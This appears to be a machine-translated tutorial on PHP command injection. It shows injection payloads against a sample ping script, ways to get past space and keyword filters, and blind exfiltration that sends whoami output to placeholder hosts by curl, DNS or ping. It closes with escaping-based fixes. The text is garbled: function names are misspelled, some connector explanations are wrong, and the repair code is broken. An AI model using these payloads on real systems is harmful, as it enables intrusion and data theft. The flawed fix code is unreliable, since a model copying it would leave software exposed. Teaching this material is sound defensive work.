Command Execution Vulnerability
- Principle some functions of the application program call functions that can execute system commands. If the parameters are controlled by the user, it is possible to splice commands into normal functions through malicious connectors, so as to execute system commands at will
php common command execution functions and operators
system function
Used to execute external programs and display output
string system ( string $command [,int $return_var ])
//index.php
<?php system('whoami');?>
Output root after execution
exec function
Used to execute an external program
string exec(string $command[,array &$output[,ubt &$return_var]])
//index.php
<?php echo exec('whoami');?>
When echo is added during execution, the result of whoami will be output
shell_exec function
Execute the command through the shell environment and return the complete output as a string
string shell_exec(string $cmd)
//index.php
<?php echo shell_exec('whoami');?>
When echo is added during execution, the result of whoami will be output
passthu function
Used to execute external programs and display the original output
void passthru(string $command[,int &$return_var])
//index.php
<?php passtru('whoami');?>
After execution, the default output is root
popen function
Open process file pointer
resource popen (string $command,string $mode)
//index.php
<?php popen("touch test.txt","r")?>
After the code is executed, test. Will be created in the current folder Txt file
proc_poen function
Pointer to open process file
resource proc_popen (string $cmd,string $descriptorspec,array&$pipes[, string $cwd[,array $other_potions]])
//index.php
<?php
$proc=proc_poen("whoami",
array(
array("pipe","r"),
array("pipe","w"),
array("pipe","w")
),
$pipes);
print stream_get_contents($pipes[1]);
?>
Output results after execution
back quote
The single quotation mark is a php execution operator. php will try to execute the contents in the single quotation mark as a shell command and return the output information
//index.php <?php echo `whoami`;?> Output after execution`root`
Command execution vulnerability under Windows
Command connector
&Command connector
&If the previous statement is false, the statement after & is executed
&If the previous statement is true, it will be executed
&&Command connector
&&If the previous statement is false, an error will be reported directly and the subsequent statement will not be executed
&&If the previous statement is true, it will be executed before and after
|Command connector
|If the previous statement is false, an error will be reported directly and the subsequent statement will not be executed
|If the previous statement is true, execute the following statement
||Command connector
||If the preceding statement is false, execute the following statement
||If the previous statement is true, only the statements before 𞓜 will be executed, and the statements after 𞓜 will not be executed
utilize
example
<?php
$ip=$_GET['ip'];
system("ping ".$ip);
?>
Normal input? ip=127.0.0.1 will return the result of ping
Enter ip=127.0.0.1|whoami
It will return the information of the current user. Of course, you can only trust your net user and other sensitive operations about user account management
Command execution vulnerability under Linux
Command connector
; Command connector
Semicolon; Make multiple commands execute in sequence before and after execution
For example, execute id under Linux; id, the first and second id commands will execute and output the current user information
&Command connector
&The function is to make the command run after it, so that multiple commands can be executed at the same time
For example, execute the commands before and after ID & whoamI to output user information
&&Command connector
The function is to execute the following command if the previous command is executed successfully
|Command connector
Taking the output of the previous command as the input of the subsequent command will be executed before and after, but only the execution results of the subsequent command will be displayed
||Command connector
If the front command is executed successfully, the rear command will not be executed. If the front command fails, the rear command will be executed
utilize
example
<?php
$ip=$_GET['ip'] ;
system("ping -c 3".$ip);
?>
Code call system function input? ip=127.0.0.1;id returns user information after successful execution. Of course, other linux commands can also be executed
Command execution bypass
Bypass space filtering
${IFS} bypass
${IFS} is a special environment variable of the shell. It is an internal Yu separator under Linux. The value stored in $IFS can be a space, tab, line break or other custom symbols
example
<?php
$ip=$_GET['ip'];
system("ping -c 3".ip)
?>
input
http://xxx.xxx.xxx.xxx/exec/commandexec.php?ip=127.0.0.1;cat${IFS}commandexec.php
Return commandexec PHP source code content
$IFS bypass
Usage is similar to ${IFS}
Tab bypass
%09 is a tab URL encoding. You can bypass space filtering by% 09 instead of spaces
http://xxx.xxx.xxx.xxx/exec/commandexec.php?ip=127.0.0.1;cat%09commandexec.php
{} bypass
http://xxx.xxx.xxx.xxx/exec/commandexec.php?ip=127.0.0.1;{cat,commandexec.php}
< bypass
http://xxx.xxx.xxx.xxx/exec/commandexec.php?ip=127.0.0.1;cat<commandexec.php
Bypass keyword filtering
Variable splicing bypass
Linux supports variable assignment, which can bypass the filtering principle through splicing
http://xxx.xxx.xxx.xxx/exec/commandexec.php?ip=127.0.0.1;a=c;b=at;$a$b commandexec.php
Null variable bypass
http://xxx.xxx.xxx.xxx/exec/commandexec.php?ip=127.0.0.1;ca${x}t commandexec.php
System variable bypass
${shellops} is a system variable. You can use the character splicing of the system variable to bypass the filtering
\Bypass
For example, c\a\t bypasses cat command filtering
Wildcard bypass
*Represents 0 to more than one character
? Represents an arbitrary character
The character range in [] represents any character in the character range
example
/etc/passwd
Can use
/???/???sw?
bypass
shell bounce bypass
When using shell rebound to attack, if there is filtering, you can bypass the filtering and execute commands through wildcards
base64 encoding bypass
For example, the base64 encoding of id is aWQ = and then decoded by basa64 -d to bypass the filtering
as
http://xxx.xxx.xxx.xxx/exec/commandexec.php?ip=127.0.0.1;`echo "aWQ=" base64 -d`
expr and awk bypass
Get characters from other files and construct commands through expr and awk commands
For example, the content of the fff file is the string wdnmd Com through the following command
expr substr$(awk NR=1 fff)1 1
You can get the first character W stored in the file
Command execution without echo
If there is command execution but no echo, you can bounce back to vps through shell bounce, and then execute the command through vps. If you cannot bounce back, you can also obtain the execution result through DNS pipeline resolution
Get user name under Linux
curl test.fff.com/`whoami` ping -c 1 `whoami`.test.fff.com
Under Windows
Get computer name
for /F %x in ('whoami') do start http://xxx.com/%x
user name
for /F "delims-\tokens=2" %i in ('whoami') do ping -n 1 % i.xxx.com
Execute the following command on the website to obtain the user name root
curl "http: //xxx.com?/'whoami'
Vulnerability repair
1. Disable_ Sensitive functions in functions
2. Function filtering
Escape hellarg function
The escape hellarg function transcodes a string into a parameter that can be used in a shell command to
Filter parameters in commands
string escape shellarg (string $arg)
Function adds a single quotation mark to a string and can reference or escape any existing string
Single quotation marks, which can directly pass a string into the shell function and ensure that it is safe
Repair cases
<?php
$ip=$_GET['ip'] ;
system("ping -c 3".escapeshellarg($ip));
?>
escapeshellcmd function
shell metacharacters can be escaped and filtered
string escapeshellcmd(string $command)
For malicious command characters in the string that may deceive the shell, the escape function ensures that the data entered by the user is escaped before being transferred to the system function or executing the operator
The function adds a backslash between characters
<?php
$ip=$_GET['ip'] ;
system(escapeshellcmd("ping -c 3")"ping -c 3".$ip);
?>